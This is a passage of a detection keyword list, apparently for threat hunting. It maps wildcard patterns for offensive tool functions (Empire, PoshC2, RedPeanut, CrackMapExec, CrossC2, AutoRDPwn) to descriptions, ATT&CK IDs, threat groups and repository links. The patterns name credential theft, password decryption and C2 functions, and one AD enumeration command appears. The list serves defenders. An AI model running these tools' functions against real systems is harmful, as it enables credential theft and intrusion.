TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ChromeHistory*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*GetChromeSecrets*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*GETCLIPBOARD*GETLOCALGROUP*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Get-ClipboardContents*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ClipboardContents.ps1*,offensive_tool_keyword,empire,Empire scripts 
paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-CompressedAgent*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-CompressedAgent.ps1*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 
3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-CompressedShellcode*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-CompressedShellcode.ps1*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Get-ComputerDetails*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*GetComputersFromActiveDirectory*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-creditcarddata *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - 
HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-CredPersist*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*getCrossC2Beacon*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z 
-*getCrossC2Site*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*Get-DCBadPwdCount*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SMBAutoBrute.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DecodedPassword*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-DecodedPassword*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z 
-*Get-DecryptedCpassword*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-DecryptedCpassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DecryptedPassword*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-DecryptedPassword*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-DecryptedSitelistPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-delegation *All*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*get-delegation *Unconstrained*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*Get-DFSshare*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-DiscosdurosGet-PSDrive*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*getdllbaseaddress*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get-dodgyprocesses*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - 
T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-DomainAdmins.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*Get-DomainComputer -TrustedToAuth | select name,offensive_tool_keyword,AD exploitation cheat sheet,msds-allowedtodelegateto*,T1595 - T1590 - T1591 - T1213 - T1039 - T1592,N/A,N/A,N/A,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-DomainDFSShareV1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainDFSShareV2*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainForeignGroupMember*,offensive_tool_keyword,AD exploitation cheat sheet,Abusing inter-forest trust Powersploit,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-DomainManagedSecurityGroup*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
